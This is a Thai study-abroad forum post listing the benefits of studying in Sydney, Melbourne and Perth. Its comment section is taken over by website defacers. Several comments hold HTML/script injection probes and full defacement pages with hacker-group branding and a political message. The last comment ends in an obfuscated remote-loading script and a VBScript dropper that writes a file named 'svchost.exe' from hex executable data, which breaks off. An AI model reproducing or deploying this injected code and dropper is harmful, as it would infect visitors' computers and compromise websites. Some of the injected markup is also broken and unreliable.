head
FRIENDS INTERNATIONAL EDUCATION CENTER
 รายละเอียดหัวข้อ
ข้อดี ๆ ของการไปเรียนในแต่ละเมือง ที่ออสเตรเลีย
ข้อดีของการไปเรียนที่ซิดนีย์
1. เป็นเมืองแห่งการศึกษา มีหลักสูตรและมหาวิทยาลัยที่มีคุณภาพให้เลือกมากมาย
2. เป็นเมืองที่มีคุณภาพชีวิตที่ดี อัตราการเกิดอาชญากรรมต่ำ
3. เหมาะสำหรับนักศึกษาที่ต้องการเรียนและทำงานพิเศษไปด้วย เพราะมีงานพิเศษให้ทำหลากหลายทั้งกับคนไทยและชาวต่างชาติ
4. เป็นเมืองที่คนไทยนิยมไปเรียนต่อมากที่สุดในออสเตรเลีย
5. เป็นเมืองแห่งแฟชั่น การศึกษา การท่องเที่ยว มีกิจกรรมให้ทำตลอด
6. เป็นเมือง Multi – cultural มีประชากรหลากหลายเชื้อชาติ ทำให้สามารถเรียนรู้วัฒนธรรมต่างๆ และมีโอกาสได้เพื่อนใหม่ตลอดเวลา
7. ที่พัก และอาหารหาได้ง่าย มีอาหารหลากหลายประเภทจากทั่วทุกมุมโลก
8. สภาพอากาศค่อนข้างดี ไม่ร้อนจัดหรือหนาวจัด
9. มีสถานที่ท่องเที่ยวหลากหลาย ทั้งทางธรรมชาติ ชายทะเล หรือสถานที่ทางประวัติศาสตร์
ข้อดีของการไปเรียนที่เมลเบิร์น
1. สมญานามของเมลเบิร์นคือเมืองแห่งการศึกษา สวนสาธารณะและศิลปะ มีการจัดระบบการเรียนการสอนที่เปิดโอกาสให้กับนักเรียนนานาชาติ สถาบันการศึกษาของออสเตรเลียทั้งของรัฐและเอกชน จะแบ่งการศึกษาตั้งแต่ชั้นปฐมวัย ประถมศึกษา มัธยมศึกษา และอุดมศึกษา ในระดับมหาวิทยาลัยจะมีการเปิดสอนในสาขาแขนงต่างๆ มากมาย
2. การเดินทางไปที่นี่ก็จะใช้เวลาบินประมาณ 8 ชั่วโมงครึ่ง ซึ่งถือว่าไม่ใกล้หรือไกลเกินไปและเวลาเร็วกว่าประเทศไทย 3 ชั่วโมง
3. บรรยากาศของ Melbourne จะสงบกว่า ไม่วุ่นวายเหมือน Sydney แต่เป็นนครแห่งความหลากหลายทางด้าน วัฒนธรรม และผู้คนที่มีอัธยาศัยดี เป็นเมืองที่ปลอดภัย อากาศค่อนข้างเย็น อาคารบ้านเรือนในเมืองนี้สวยงาม มีลักษณะคล้ายทางยุโรปเช่น ประเทศฝรั่งเศส
4. เมลเบิร์น เป็นเมืองที่สะอาดและเป็นระเบียบคล้ายๆ กับ Christchurch ของนิวซีแลนด์ ต่างกันก็ตรงที่เมลเบิร์นมีประชากรมากกว่า เพราะแค่เมืองนี้เมืองเดียวก็มีประชากรเท่ากับประเทศนิวซีแลนด์ทั้งประเทศ และที่แตกต่างกันอีกก็คือที่เมลเบิร์นมีความทันสมัยไม่แพ้เมืองใหญ่ๆ ของโลก ทั้งตึกสูง สถานบันเทิง การคมนาคม ที่สะดวก เช่น ภายในตัวเมืองเขาจะมีรถ Melbourne Tram หรือรถรางไฟฟ้าแล่นตามถนนหลักๆ การใช้รถไฟฟ้าในการขนส่งผู้โดยสารในเมืองก็เป็นการลดมลพิษทางอากาศลงได้มาก
5. เป็นเมืองหนึ่งของโลกที่มีการผสมผสานและกลมกลืนทางวัฒนธรรมของคนชาติต่าง ๆ เป็นอย่างดี ก่อให้เกิดวัฒนธรรมของการอยู่ร่วมกันของคนต่างวัฒนธรรม และเป็นที่มาของร้านอาหารนานาชาติมากมาย กว่า 2,300 แห่ง เป็นเมืองที่เพียบพร้อมอุดมสมบูรณ์ด้านอาหารการกิน มีภัตตาคาร ร้านอาหารประเภทต่าง ๆ ทั้งแบบหรูหรา ร้านอาหารขนาดเล็ก หรือ Cafeให้เลือกมากมาย
6. ตัวเมืองมีระบบการขนส่งมวลชนที่มีประสิทธิภาพสูง ทั้งรถราง รถไฟ และรถโดยสายประจำทาง รวมเป็นระบบขนส่งมวลชนเครือข่ายที่ครอบคลุมการให้บริการเชื่อมต่อกันในตัวเมืองและชานเมือง
7. เป็นเมืองที่มีความเจริญเติบโตสูง จึงมีงานพิเศษให้เลือกทำมากมาย และรายได้ดี
8. มีสถานที่ท่องเที่ยวที่น่าสนใจ รวมถึงกิจกรรมให้ทำเป็นประสบการณ์ชีวิตมากมาย
9. เป็นเมืองที่ติดอันดับเมืองที่น่าอยู่ที่สุด มีความปลอดภัยสูง ประชากรมีคุณภาพชีวิตที่ดี
ข้อดีของการไปเรียนเพิร์ท
1. เป็นเมืองขนาดกลางมีที่น่าอยู่และมีมาตรฐานการครองชีพที่ดีที่สุดในโลก เป็นเมืองที่มีค่าครองชีพต่ำเป็นอันดับที่ 3 ของโลก
2. เป็นเมืองที่ใกล้เมืองไทยที่สุดเมื่อเทียบกับเมืองใหญ่ เมืองอื่น ใช้เวลาการเดินทางเพียง 6 ชั่วโมง ทำให้ประหยัดค่าใช้จ่ายในการเดินทาง และมีเวลาใกล้เคียงกับประเทศไทยเพราะเร็วกว่าเพียง 1 ชั่วโมง
3. เป็นเมืองแห่งการศึกษา มีคนไทยน้อย เหมาะในการศึกษาภาษาอังกฤษเป็นอย่างมาก
4. สถาบันการศึกษาในเมืองเพิร์ท เป็นสถาบันชั้นนำระดับโลกและมีชื่อเสียงไปทั่วโลก นักศึกษาที่จบหลักสูตรการศึกษาจากเพิร์ท สามารถมั่นใจได้ว่าคุณวุฒิทางการศึกษาจะเป็นที่ยอมรับในระดับนานาชาติเมื่อต้องหางานทำหรือศึกษาต่อ
5. เป็นเมืองที่มีจำนวนชั่วโมงแสงแดดส่องสว่างมากกว่าเมืองหลวงแห่งอื่นๆ ในออสเตรเลีย
ทำให้มีลักษณะอากาศคล้ายกับประเทศไทย มีฤดูร้อนที่อบอุ่นและไม่มีฝน และมีฤดูหนาวที่ไม่หนาวจัดคุณจะสามารถสนุกสนานกับกิจกรรมกลางแจ้งได้ตลอดทั้งปี
6. เป็นแหล่งรวมของวัฒนธรรมอันหลากหลายซึ่งอยู่ร่วมกันได้อย่างสอดคล้องและปรองดอง
มีผู้คนมากกว่า 200 สัญชาติพำนักอาศัย ทำงาน และศึกษาอยู่ในสังคมรุ่นใหม่ที่มีความก้าวหน้าแห่งนี้ และสะท้อนให้เห็นได้จากอาหารที่มีให้คุณเลือกมากมายหลายประเภท เพียงเดินไปตามถนนสักสายในแถบนอร์ธบริดจ์ คุณก็จะได้สัมผัสกับความหลากหลายของวัฒนธรรมที่ผสมผสานกันอยู่ในอาหารจานเดียว ผักสดๆ อาหารทะเลที่น่าลิ้มลอง และอาหารพื้นเมืองจานเด็ด จะช่วยเพิ่มประสบการณ์การรับประทานอาหาร อันน่าประทับใจในเมือง Perth ให้กับคุณ
7. เป็นหนึ่งในเมืองการศึกษาที่ใช้งบค่าใช้จ่ายน้อยที่สุดในบรรดาประเทศที่ใช้ภาษาอังกฤษเป็นภาษาพูด ทั้งการเรียนการสอนที่นี่ก็สามารถเทียบชั้นได้กับแหล่งการศึกษาที่ดีที่สุดของโลก นอกจากนี้ Perth ยังมีมาตรฐานการครองชีพสูง แต่มีค่าครองชีพต่ำ เมื่อเปรียบเทียบกับเมืองใหญ่อื่นๆ ในออสเตรเลียและในต่างประเทศ เช่นราคาที่พักอาศัยจะถูกกว่า ใน Sydney ประมาณ30%
8. ระบบขนส่งมวลชนภายในเมือง Perth มีราคาถูกและทันสมัย ประกอบด้วยเครือข่ายเส้นทางเดิน
เรือเฟอร์รี่ รถโดยสารประจำทาง และรถไฟ ซึ่งให้บริการที่ปลอดภัยในราคาที่ไม่แพง ทั้งคุณยังสามารถเดินทางในใจกลางย่านธุรกิจหรือ CBD ด้วยระบบขนส่งมวลชนทุกชนิดโดยไม่ต้องเสียค่าใช้จ่ายใดๆ เลย
9. การทำงานพิเศษแบบพาร์ทไทม์จะช่วยให้คุณมีเงินไว้ใช้จ่ายเพิ่มมากขึ้น ทั้งยังช่วยให้คุณรู้สึก
เสมือนเป็นส่วนหนึ่งของชุมชนได้อย่างแท้จริง เวสเทิร์นออสเตรเลียเป็นศูนย์กลางเศรษฐกิจของ
ประเทศออสเตรเลีย และมีอัตราการว่างงานต่ำที่สุดในออสเตรเลีย นั่นย่อมหมายความว่ามีงานพิเศษแบบพาร์ทไทม์จำนวนมากในเพิร์ธ สำหรับนักศึกษาต่างชาติ ซึ่งมีสิทธิในการทำงานได้สูงสุด
20 ชั่วโมงต่อสัปดาห์ (และสูงสุด 40 ชั่วโมงต่อสัปดาห์ในระหว่างช่วงปิดภาคการศึกษา)
10. ประสบการณืที่หลากหลายเมื่อถึงคราวที่คุณต้องจากเมือง Perth ไป คุณจะกลับไปพร้อมกับคุณวุฒิทางการศึกษาระดับโลกแต่อย่าพลาดที่จะหาความสนุกสนานในระหว่างที่คุณยังพอจะทำได้ ผู้คนที่ให้การต้อนรับอย่างเป็นมิตร อาหารเลิศรส อากาศที่ดีเยี่ยม และชายหาดที่สวยที่สุดในโลกหลาแห่ง ความบันเทิงยามค่ำคืน กิจกรรมและกีฬาทางน้ำที่ครบครัน ตลอดจนสภาพแวดล้อมที่ส่งเสริมการเรียนรู้
โดย : FRIENDS-INTER เมื่อวันที่ 04/07/2011 เวลา 15:19:08


  ความคิดเห็นที่ [ 1 ]
<html>
<head>

<body background="White">
</font></p></style>
</head><body alink="yellow" bgcolor="black">

<title>Magelang6etar | Newbie-Security</title>
<link rel="shortcut icon" href="http://cdn.kaskus.com/themes_2.0/img/layout/fjb-fjb.png">
<embed src="http://youtube.googleapis.com/v/MOHstTAdw-g&hl=en_US&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<body onLoad="animate()">

</head><body oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" style="cursor: crosshair;
</script>
<font face="Nadall" font color="gray"><b>Defaced?By || Magelang6etar</b>
<style type="text/css">
<!--
.ahgcrewstyle {
color: #F00;
}
.ahg {
color: #0F0;
}
#message font strong {
font-family: Tahoma, Geneva, sans-serif;
font-size: 18px;
}
.gre {
color: #9F3;
font-size: 32px;
}
#message font {
font-size: 18px;
}
-->
</style>
</head><body alink="gray" bgcolor="black" vlink="gray" link="gray" text="gray">
<p></p><center>
<center></center>
<script type="text/javascript">
TypingText = function(element, interval, cursor, finishedCallback) {
if((typeof document.getElementById == "undefined" || (typeof element.innerHTML == "undefined") {
this.running = true;
return;
}
this.element = element;
this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
this.interval = (typeof interval == "undefined" ? 100 : interval);
this.origText = this.element.innerHTML;
this.unparsedOrigText = this.origText;
this.cursor = (cursor ? cursor : "";
this.currentText = "";
this.currentChar = 0;
this.element.typingText = this;
if(this.element.id == "" this.element.id = "typingtext" + TypingText.currentIndex++;
TypingText.all.push(this);
this.running = false;
this.inTag = false;
this.tagBuffer = "";
this.inHTMLEntity = false;
this.HTMLEntityBuffer = "";
}
TypingText.all = new Array();
TypingText.currentIndex = 0;
TypingText.runAll = function() {
for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
}
TypingText.prototype.run = function() {
if(this.running) return;
if(typeof this.origText == "undefined" {
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
return;
}
if(this.currentText == "" this.element.innerHTML = "";
if(this.currentChar < this.origText.length) {
if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
this.tagBuffer = "<";
this.inTag = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
this.tagBuffer += ">";
this.inTag = false;
this.currentText += this.tagBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inTag) {
this.tagBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
this.HTMLEntityBuffer = "&";
this.inHTMLEntity = true;
this.currentChar++;
this.run();
return;
} else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
this.HTMLEntityBuffer += ";";
this.inHTMLEntity = false;
this.currentText += this.HTMLEntityBuffer;
this.currentChar++;
this.run();
return;
} else if(this.inHTMLEntity) {
this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
this.currentChar++;
this.run();
return;
} else {
this.currentText += this.origText.charAt(this.currentChar);
}
this.element.innerHTML = this.currentText;
this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "";
this.currentChar++;
setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
} else {
this.currentText = "";
this.currentChar = 0;
this.running = false;
this.finishedCallback();
}
}
</script>
<center>
<font>
</font><p id="message"><font> <strong>
<br>
<img src="http://i.imgur.com/80KjaPN.png" >
<br><font face="Nowadays"; color="#57595e"; size="6">Kapan Aku Bisa Seperti Mu </font>
<br>
<font face="Optimer"; color="#0042ff"; size="6">Newbie-Security!<br>Contact : situmaho@gmail.com</font><br>
<img src="http://forum.detik.com/images/smilies/devilish.png" >
<!-- HTML codes by Quackit.com -->

<script type="text/javascript">
new TypingText(document.getElementById("message", 50, function(i){ var ar = new Array("\\", "", "/", "-"; return " " + ar[i.length % ar.length]; });
//Type out examples:
TypingText.runAll();
</script>
</font></p>
</center></center>
<br>

โดย : Magelang6etar | Newbie-Securit เมื่อวันที่ 06/10/2013 เวลา 00:08:29 


  ความคิดเห็นที่ [ 2 ]
<marquee><font color=Blue size=32>DevilScreaM</font></marquee>
โดย : ddddddd เมื่อวันที่ 08/10/2013 เวลา 21:11:17 


  ความคิดเห็นที่ [ 3 ]

Qform.php
โดย : Qform.php เมื่อวันที่ 09/10/2013 เวลา 08:15:25 


  ความคิดเห็นที่ [ 4 ]

&#1575;&#1604;&#1581;&#1610;&#1576;&#1610;
โดย : Qform.php เมื่อวันที่ 09/10/2013 เวลา 08:19:13 


  ความคิดเห็นที่ [ 5 ]

โดย : <marquee><font color=Blue size เมื่อวันที่ 31/03/2014 เวลา 03:44:34 


  ความคิดเห็นที่ [ 6 ]
<marquee><font color=Blue size=32>lol</font></marquee>
โดย : fdad เมื่อวันที่ 31/03/2014 เวลา 03:46:00 


  ความคิดเห็นที่ [ 7 ]
><marquee><h1>Lawlz</h1></marquee> <!--
โดย : lulz เมื่อวันที่ 31/03/2014 เวลา 04:00:09 


  ความคิดเห็นที่ [ 8 ]
adfqa

โดย : <marquee><font color=Blue size เมื่อวันที่ 31/03/2014 เวลา 05:26:44 


  ความคิดเห็นที่ [ 9 ]
idfia
โดย : "><h1>lulz</h1><!-- เมื่อวันที่ 31/03/2014 เวลา 05:43:23 


  ความคิดเห็นที่ [ 10 ]
<html lang="en"><head>
<title>single attacker</title>

<meta name="description" content="hello sir= &quot;INDONESIA BLACK HAT CYBER TEAM &quot; numero uno :v ">

<link rel="stylesheet" href="http://www.modernizedmedia.com/cache/884de6be92aa808fcd3cfc326556efc9.css">

<script src="http://www.modernizedmedia.com/cache/a84313665bbe3158c53cad23dd8457df.js"></script>
<style type="text/css">
.style1 {
left: -1;
top: 4;
}
.style2 {
width: 805px;
}
.style3 {
width: 805px;
height: 35%;
}
</style></head>
<body>

<div id="network-bar">
<div class="padder">
<ul class="pull-left">
<li class="active">
<a href="#/" title="single attacker">
<img src="http://www.modernizedmedia.com/sites/local/main/assets/img/favicon.png" alt="Modernized Media">
<span>ACTION:++ED</span>
</a>
</li>
<li>
<a href="https://www.facebook.com/Amazighackers?ref=br_rs" title="Igniter Rewards">
<img src="http://im84.gulfup.com/W9pKJr.png" alt="Igniter Rewards" width="11" height="4">
<span>Fanigniter</span>
<img src="http://im53.gulfup.com/2FCpJc.jpg" width="8" height="4"></a></li>
</ul>
<div class="pull-right">
<div class="social">
<a target="_blank" href="https://www.facebook.com/Amazighackers" class="social-icon social-icon-facebook"></a>
<a target="_blank" href="https://www.twitter.com/ViRusx.EL" class="social-icon social-icon-twitter"></a>
</div>
<address>
Powered By Moxat Copyright 2014
<abbr title="Phone">MA</abbr>+212602993731
</address>
</div>
</div>
</div><div id="network-bar" class="style1">
<div class="padder">
<ul class="pull-left">
<li class="active" style="width: 161px">
<a href="https://www.facebook.com/ibhcteam?ref=hl" title="INDONESIA BLACK HAT CYBER TEAM">
<img src="http://im84.gulfup.com/W9pKJr.png" alt="FIND US ON FACEBOOK" width="16" height="2">
<span>FIND US ON FACEBOOK</span>
</a>
</li>
<li>

</li>
</ul>
<div class="pull-right">
<div class="social">
<a target="_blank" href="https://www.facebook.com/moxat90" class="social-icon social-icon-facebook"></a>
<a target="_blank" href="https://twitter.com/"Alunan angin class="social-icon social-icon-twitter"></a>
<a target="_blank" href="https://twitter.com/"Alunan angin" class="social-icon social-icon-linkedin"></a>
</div>
<address>
POWERED BY Moxat <abbr title="Phone">-</abbr>Copyright 2014 </address>
</div>
</div>
</div>
<div id="header">
<div class="padder">
v</div>
</div>

<div class="navbar ">
<ul>
<li>
<a href="https://www.facebook.com/moxat90" class="nav-item blue" data-href="Moxat">
<div class="arrow"></div>
<div class="back"><img src="http://1.bp.blogspot.com/-y8vPVKGN_E0/TsE-uPcTFOI/AAAAAAAAAIk/9u4D5Cp5SOk/s1600/M.jpg"></div>
<div class="radial">Moxat</div>
<div class="gradient1"></div>
<div class="gradient2"></div>
<div class="title"></div>
</a>
</li>
<li>
<a href="https://www.facebook.com/aji89b" class="nav-item green" data-href="./Anzhi72">
<div class="arrow"></div>
<div class="back"><img src="http://3.bp.blogspot.com/-uKTPCNUn_wU/TsE_bZdMVBI/AAAAAAAAAI0/L8FMNfK9-Js/s1600/O.jpg"></div>
<div class="radial"></div>
<div class="gradient1"></div>
<div class="gradient2"></div>
<div class="title"></div>
</a>
</li>

<li>
<a href="https://www.facebook.com/mahfud.clalu" class="nav-item yellow" data-href="./RkeNz_007
">
<div class="arrow"></div>
<div class="back"><img src="http://2.bp.blogspot.com/-8H-ZuHlfeec/TsFEnIePY0I/AAAAAAAAAJ8/7_BEKNHDqkU/s1600/X.jpg"></div>
<div class="radial">
</div>
<div class="gradient1"></div>
<div class="gradient2"></div>
<div class="title">
</div>
</a>
</li>
<li>
<a href="https://www.facebook.com/405Forbiden" class="nav-item orange" data-href="./RussX9">
<div class="arrow"></div>
<div class="back"><img src="http://3.bp.blogspot.com/-AR70EZEhevI/TsE5RQUiGfI/AAAAAAAAAHE/pGzjTv6p8eg/s1600/A.jpg"></div>
<div class="radial"></div>
<div class="gradient1"></div>
<div class="gradient2"></div>
<div class="title"></div>
</a>
</li>
<li style="text-align: center">
<a href="https://www.facebook.com/yogi.jamhur" class="nav-item blue" data-href="Mr.Blank~48
">
<div class="arrow"></div>
<div class="back"><img src="http://2.bp.blogspot.com/-JRO8HYi8o1I/TsFDIBEpCDI/AAAAAAAAAJc/P1fISGhhbl0/s1600/T.jpg"></div>
<div class="radial"></div>
<div class="gradient1"></div>
<div class="gradient2"></div>
<div class="title">
</div>
</a>
</li>
<li class="style3" style="text-align: center; font-size: small">
<strong><span style="font-size: large">Why Hacked Website?</span></strong><br />
<strong>Website Hacked by Moxat= "INDONESIA BLACK HAT CYBER TEAM
<br />
</strong>(<strong>Islamophobes) + (Polisario terrorists) + (the racists) + (The Atheists) + (the corrupt)
<br />
and all those who want to divide us" (our belief) = God,
Homeland, </strong></li>
<li class="style3" style="text-align: center; font-size: small">
</li>
<li class="style2" style="text-align: center; font-size: small">
</li>
</ul>
</div>
<div id="page-holder" style="text-align: center; font-size: x-large; color: #808080"></p>
<object>
<embed type="application/x-shockwave-flash" src="http://freemp3x.org/jwplayer/player.swf" quality="high" allowscriptaccess="always" allowfullscreen="true" wmode="opaque" flashvars="autostart=true&file=https://www.youtube.com/watch?v=eOKtmzDZvYk" height="0" width="0">
</object>
<strong>Hacked By Moxat
<br>
<br>
WE ARE</strong></div>
<script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://";var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request";document.write("?id=1";document.write("&amp;enc=telkom2";document.write("&amp;params=" + "4TtHaUQnUEiP6K%2fc5C582PlvV7TskJKD23ugeUCAzcyWxyiFfYbC%2b7lr2U1CmJF5GswqLXkAWZXppXQvPkkeih4wNlQklUHhTq7L1xRMAdTyR%2bWxTd6469cTtEPOM8k%2b7SCWJXmaAZ3G56A8Frv9Dk1nBjNVuNjoJkaJPt8GituHg7O90D3MwVDQd1bYsGKjiwAw29Fngkj2ggQR4Eyo7tupKly0qKc1C6yIti%2fWhvR%2bPXyK2UUQO1%2fx9F70379YdWRH906bJt54yeY%2bGdcs5SjQglVzAxuoFuCGhiarJZlWNHg0HN7FCY1P2QrPortQUKIr2c35fotSxdqQg5Q3%2f0jqj7ZYCDg7M2X5fXADETcAmbc3%2b5elYQS3SWXRDXoraNcypH5Y5Hhq9lXY7JvVSw%3d%3d";document.write("&amp;idc_r="+idc_glo_r);document.write("&amp;domain="+document.domain);document.write("&amp;sw="+screen.width+"&amp;sh="+screen.height);document.write("></scr"+"ipt>";}</script><noscript>activate javascript</noscript></body>
</html><SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000D72D862D934CE87E934CE87E934CE87E8F03B77E914CE87E9C74887ED34DE87EC644B37E8E4CE87EA0CBE77E924CE87E5043B77EB14CE87E8338B27E9F4CE87E3AC2B57E924CE87E52696368934CE87E000000000000000000000000000000000000000000000000504500004C010500E6BCC0460000000000000000E0000F010B0106040022000000E0010000080000FC110000001000000040000000004000001000000002000004000000050001000400000000000000002003000004000000000000020000800000400000600000000040000010000000000000100000000000000000000000AC160000A000000000E000008C070000D0430000180000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000B00100000000000000000000000000000000000000000000000000002E746578740000004E210000001000000022000000040000000000000000000000000000200000E02E6461746100000030970000004000000012000000260000000000000000000000000000400000C02E727372630000008C07000000E000000008000000380000000000000000000000000000C00000402E726461746100000FAE010000F000000FA8010000400000000000000000000000000000600000E06E686E63767575000080000000A002000010000000EA0100000000000000000000000000200000E075696D71776E690000100000002003000000000000660200000000000000000000000000000000C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FC1800000B1900001C1900002B190000000000004C190000581900006A190000841900009B190000B7190000C4190000D0190000E7190000FA1900000F1A0000241A00002F1A0000401A00004F1A00005E1A00006E1A0000861A0000911A0000AD1A0000C81A0000DA1A0000F41A0000021B0000131B0000301B00003E1B00004F1B0000611B00006D1B00007E1B00008C1B00009B1B0000AD1B0000C31B0000CE1B0000E31B0000F61B0000021C0000131C0000221C0000321C0000411C00004D1C0000631C0000721C00008A1C0000A01C0000AF1C0000BF1C0000CE1C0000D61C0000E71C0000F21C0000FF1C00001A1D00002E1D0000391D0000501D0000601D00006D1D0000801D00008D1D00009B1D0000AA1D0000BF1D0000D51D0000E81D0000FA1D0000111E00002B1E00003C1E0000481E00005E1E00006C1E0000821E00008F1E0000AD1E0000BE1E0000D51E0000EB1E0000FC1E0000000000001A1F000000000000381F0000431F0000511F000000000000681F0000761F0000841F00009A1F0000A51F000000000000C01F0000D21F0000E71F00000000000004200000142000002B200000000000000000000000003700363B3349004635434700374F003D0038373D3A454B003C0000000036333F4B42004F00364F33314A33004E000047003C4A4043004A394F0046473C00003A33334448364B558BEC83EC2C8165EC000000008D5B5621D60305663240005889750003157C48400081E9AB4E40008D7F8F83E8C085D875058D088B142403CA21F2C60587DD40000181E9724640008B3C24FF15E44C40002B1C24BAED144000890D98DB4000877D00E9E2820200008B550459C3684C2740005821C16A765F81C78251400033D24A8D7C24E433DB4B83EBF468D04C4000FF1580104000FF742408538B1424490335773E40004F8D404085F87508A1034840002B1C2468D130400021D62BD081C6D31540005EE8AE0000004A03CAFF153C1140004158C3000000000000350041400047360000303700444B47464A003F380000433B4035003037003E303A00344900493A00003F41003A43000032363A4737434B3E0037003F000045004800000000384F30454E4F4039354B4A4D37383F410000460000004F4400410000413B00000040000000444400003A31004C000048004900443E4A3D4D3146364C464B004E4900443200003F0000434D4B00003F004DC71CF0A82000558BECC60549DB4000018B1424BE6816400003F3C605D0DC40000183E9F88D5B3A5121D173042BDE8BD209E389C1FF157410400073042BDE8D09FF0531DD40003DBA0000007226753C8D1D2D22400081EB214D40008D4424C8FF35DB5C400068A83A40005903CF33D221D08BDAF6D3684A494000FF150811400021D3FF35623C4000C9C34083CAFF03DA8D1C0809C364A13000000002F88BD0FECF8D1C088D1E1BDA8B422CF6D733D98A486F73036AE35BC1E8108D1C388BD92ACC74298D442404891DA0DD40008B550068272340000154241068695B400001CAFF15F41040005983E1F0C9C302DB33DB7F02FECB02DB8B420C83F37802D98B701CFECFAD7F0203DC8B40087F0809D38AD8B0668AC303DB8B503C8B1C2476052BD980F7582BDF81C2040100000304102BD88D1B8D18408B0802DB03DC234804FEC781C127504000F6D31BDE81F96C60580575E002F89233DE8BC983EA01C1CB9D8B028AD9B1788ACB25FFFF00008D1F054B30400033DA2DA0BB400075DB02F98D00311574DF40002BD868C5DF400021E31BDC6A3C83042404FEC368102F000080C7B51BDF684113400066F7DB21FB6AFE8BDFFF0424FEC3BBE94940008BDD8B0D74DF4000FFD133D98D0DE31240008BDD8D1C3081E94D1240008D1ABA1C1640008AD8B0768AC3BFE6000000313A09CB02D88B32C1FB04C1FBA681C610000000893221FB83C2FF7602F6DB83F30F83E90175CE730203DEC1FBA5BE68E3D616C456B209C6B29FF65BF9E3EA661A4EBF42169CA2F2129CE457541A00249D529556EE4DD6404909C52C9FEE191EFE692C2A97169C529556F24D2BE3D6169EEE9DD2F21A9E664E160909C45655C8EDF04D1641C2D4D616C4244FBE10090989C2E68896FAE61FD7CD278305BEB2E5D616B1D6160909B1F2E61609B195DED616BF094E8229D61608E6BE95DED61654777460D4310000314600003647464A303000314A003000004D36363000433B3A43463700480044004A48000000000000314B3F4F00440048004500003E33313839003B384B003749000037003E00004C00363C33004240000000003D004E3F4B440000440036390032003D004400474C36433B003E00373E484F310000004F314D37384600003D344B493C003B0000304A483C4C17000000000000000000003F190000001000006017000000000000000000000D1F000014100000AC18000000000000000000002B1F000060110000B418000000000000000000005D1F000068110000C41800000000000000000000B51F000078110000DC1800000000000000000000F81F000090110000EC180000000000000000000040200000A01100000000000000000000000000000000000000000000FC1800000B1900001C1900002B190000000000004C190000581900006A190000841900009B190000B7190000C4190000D0190000E7190000FA1900000F1A0000241A00002F1A0000401A00004F1A00005E1A00006E1A0000861A0000911A0000AD1A0000C81A0000DA1A0000F41A0000021B0000131B0000301B00003E1B00004F1B0000611B00006D1B00007E1B00008C1B00009B1B0000AD1B0000C31B0000CE1B0000E31B0000F61B0000021C0000131C0000221C0000321C0000411C00004D1C0000631C0000721C00008A1C0000A01C0000AF1C0000BF1C0000CE1C0000D61C0000E71C0000F21C0000FF1C00001A1D00002E1D0000391D0000501D0000601D00006D1D0000801D00008D1D00009B1D0000AA1D0000BF1D0000D51D0000E81D0000FA1D0000111E00002B1E00003C1E0000481E00005E1E00006C1E0000821E00008F1E0000AD1E0000BE1E0000D51E0000EB1E0000FC1E0000000000001A1F000000000000381F0000431F0000511F000000000000681F0000761F0000841F00009A1F0000A51F000000000000C01F0000D21F0000E71F00000000000004200000142000002B20000000000000000056617269616E74436C65617200000056617269616E74436F7079496E64000000537973537472696E674C656E000000537973416C6C6F63537472696E674C656E006F6C6561757433322E646C6C0000004C6F63616C46726565000000476574436F6D6D616E644C696E65570000004765744C6F676963616C4472697665537472696E67735700000047657457696E646F77734469726563746F727957000000457870616E64456E7669726F6E6D656E74537472696E6773570000004F70656E4576656E7457000000436F707946696C655700000047657443757272656E744469726563746F72795700000047657446756C6C506174684E616D655700000047657445786974436F646550726F636573730000004765744D6F64756C6546696C654E616D65570000006C7374726C656E410000005261697365457863657074696F6E0000004372656174654D75746578570000004C6F61644C6962726172795700000046696E644E65787446696C6557000000476574566F6C756D65496E666F726D6174696F6E5700000048656170467265650000004765745072697661746550726F66696C6553656374696F6E570000004765745072697661746550726F66696C65537472696E67570000005175657279446F734465766963655700000047657453797374656D54696D65417346696C6554696D65000000467265654C69627261727900000053657446696C65506F696E74657200000047657453797374656D44656661756C7455494C616E677561676500000043726561746546696C6557000000466F726D61744D657373616765410000005265676973746572576F774578656300000048656170416C6C6F6300000047657450726F634164647265737300000044656C65746546696C65570000004765745469636B436F756E7400000047657453746172747570496E666F410000005769646543686172546F4D756C7469427974650000005265616446696C6500000047657443757272656E7454687265616449640000004372656174654469726563746F72795700000046696E64436C6F736500000043726561746550726F63657373570000004765744C6173744572726F72000000497356616C69644C6F63616C650000004C6F63616C5265416C6C6F630000006C737472636D7069570000004D756C746942797465546F576964654368617200000047657454656D7050617468570000004765745072697661746550726F66696C65496E7457000000496E7465726C6F636B656445786368616E67650000005365744C6173744572726F72000000476574447269766554797065570000004C6F61644C69627261727941000000536C65657000000047657444617465466F726D6174570000006C7374726C656E570000004C6F63616C416C6C6F63000000556E68616E646C6564457863657074696F6E46696C74657200000047657443757272656E7450726F63